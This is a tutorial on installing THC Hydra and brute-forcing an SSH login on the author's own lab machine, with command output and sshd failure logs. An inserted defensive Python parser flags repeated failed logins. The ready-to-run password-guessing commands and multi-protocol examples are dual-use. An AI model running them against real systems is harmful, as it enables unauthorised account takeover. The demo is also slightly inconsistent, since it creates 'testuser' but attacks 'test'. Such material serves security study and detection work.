
Use The Force Luke...

Oh guys, pay attention: it's only for study purposes! You would find yourself in trouble faster than light.
Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. Newest version available at http://www.thc.org/thc-hydra


First of all we have to install the software. To build it you need the libssh and libssh-dev libraries.


$ apt-get install libssh-dev
...

Now download and build hydra:

$ mkdir hydra.src
$ cd hydra.src
$ wget "http://www.thc.org/releases/hydra-7.4.2.tar.gz"
$ tar zxvf hydra-7.4.2.tar.gz
$ cd hydra-7.4.2/
$ ./configure
$ make
$ make install

 

If everything went without errors, you should be able to launch hydra with the -h option to get some help:


$ hydra -h
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to be attacked in parallel, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp
OPT some service modules support additional input (-U for module help)
Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.

Examples:
hydra -l john -p doe 192.168.0.1 ftp
hydra -L user.txt -p defaultpw -S 192.168.0.1 imap PLAIN
hydra -l admin -P pass.txt http-proxy://192.168.0.1
hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/DIGEST-MD5

A nice thing is that we have a built-in brute-force password generator:

$ hydra -x -h
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra bruteforce password generation option usage:

-x MIN:MAX:CHARSET

MIN is the minimum number of characters in the password
MAX is the maximum number of characters in the password
CHARSET is a specification of the characters to use in the generation
valid CHARSET values are: 'a' for lowercase letters,
'A' for uppercase letters, '1' for numbers, and for all others,
just add their real representation.

Examples:
-x 3:5:a generate passwords from length 3 to 5 with all lowercase letters
-x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
-x 1:3:/ generate passwords from length 1 to 3 containing only slashes
-x 5:5:/%,.- generate passwords with length 5 which consists only of /%,.-

Let's try:

I add a user to my machine and set the password "test":
$ sudo useradd testuser
$ sudo passwd testuser


Let's find the password:
$ hydra -l test -x 1:5:a 192.168.0.102 ssh
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-04-07 07:39:55
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 server, 12356630 login tries (l:1/p:12356630), ~772289 tries per task
[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[ERROR] ssh protocol error

Oops, that's annoying: we got errors on standard output. To solve this we add the -t 8 flag to limit the number of parallel tasks run by hydra:
$ hydra -l test -x 1:5:a -t 8 192.168.0.102 ssh
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-04-07 07:41:12
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 8 tasks, 1 server, 12356630 login tries (l:1/p:12356630), ~1544578 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 194.00 tries/min, 194 tries in 00:01h, 12356436 todo in 1061:33h, 8 active
[STATUS] 190.00 tries/min, 570 tries in 00:03h, 12356060 todo in 1083:52h, 8 active
[STATUS] 197.14 tries/min, 1380 tries in 00:07h, 12355250 todo in 1044:32h, 8 active
[STATUS] 194.20 tries/min, 2913 tries in 00:15h, 12353717 todo in 1060:14h, 8 active
....


Let's see what happens in the ssh daemon logs. Nothing strange, to tell the truth, just a lot of failed authentications:
$ tail -f /var/log/auth.log
Apr 7 07:40:35 debian sshd[6275]: Failed password for invalid user test from 192.168.0.102 port 59946 ssh2
Apr 7 07:40:35 debian sshd[6275]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6277]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6245]: Failed password for invalid user test from 192.168.0.102 port 59914 ssh2
Apr 7 07:40:35 debian sshd[6245]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6285]: Failed password for invalid user test from 192.168.0.102 port 59955 ssh2
Apr 7 07:40:35 debian sshd[6285]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6283]: Failed password for invalid user test from 192.168.0.102 port 59953 ssh2
Apr 7 07:40:35 debian sshd[6283]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6299]: Invalid user test from 192.168.0.102


The problem is that it would take a week, but time is on your side: sooner or later hydra will find the right password.
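
What a defender can do with exactly these log lines, as an added example that is not part of the original post: a small Python parser that counts sshd "Failed password" entries per source address in a sliding window and flags the address once a threshold is reached. The threshold, window, year and the sample lines (modelled on the auth.log excerpt above) are assumptions constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# sshd "Failed password" line, in the format of the auth.log excerpt above.
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+[\d:]{8})\s+\S+\s+sshd\[\d+\]:\s+Failed password for "
    r"(?P<invalid>invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60), year=2013):
    """Return {ip: summary} for sources with >= threshold failures in one window."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    seen = defaultdict(lambda: {"failures": 0, "invalid_users": set()})
    flagged = {}
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue              # pam_unix and "Invalid user" lines are not counted
        # syslog timestamps carry no year; `year` is supplied by the caller (assumption)
        stamp = " ".join(m["ts"].split())
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        ip, q = m["ip"], recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        seen[ip]["failures"] += 1
        if m["invalid"]:           # the account does not exist on the host
            seen[ip]["invalid_users"].add(m["user"])
        if len(q) >= threshold:
            flagged[ip] = seen[ip]
    return flagged

# Constructed sample, modelled on the excerpt above (192.0.2.10 is a documentation address).
SAMPLE = """\
Apr 7 07:40:35 debian sshd[6275]: Failed password for invalid user test from 192.168.0.102 port 59946 ssh2
Apr 7 07:40:35 debian sshd[6275]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6245]: Failed password for invalid user test from 192.168.0.102 port 59914 ssh2
Apr 7 07:40:36 debian sshd[6285]: Failed password for invalid user test from 192.168.0.102 port 59955 ssh2
Apr 7 07:40:36 debian sshd[6283]: Failed password for invalid user test from 192.168.0.102 port 59953 ssh2
Apr 7 07:40:37 debian sshd[6301]: Failed password for invalid user test from 192.168.0.102 port 59960 ssh2
Apr 7 07:40:37 debian sshd[6299]: Invalid user test from 192.168.0.102
Apr 7 07:41:02 debian sshd[6310]: Failed password for alice from 192.0.2.10 port 40112 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE).items():
        print(ip, info["failures"], sorted(info["invalid_users"]))
```

A single mistyped password (the alice line) stays below the threshold, while the burst from one address is flagged. Tools such as fail2ban apply the same count-within-a-window logic before banning the source.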


To learn more:
General usage and options: http://www.aldeid.com/wiki/Thc-hydra

HTTP basic auth: https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
http://www.sillychicken.co.nz/Security/how-to-brute-force-your-router-in-windows.html

HTTP form based auth: http://www.art0.org/security/performing-a-dictionary-attack-on-an-http-login-form-using-hydra
http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html
http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html
https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29

Multiple protocols: http://wiki.bywire.org/Hydra
http://www.attackvector.org/brute-force-with-thc-hydra/
http://www.madirish.net/content/hydra-brute-force-utility

Telnet: http://www.theprohack.com/2009/04/basics-of-cracking-ftp-and-telnet.html
http://www.adeptus-mechanicus.com/codex/bflog/bflog.html

 








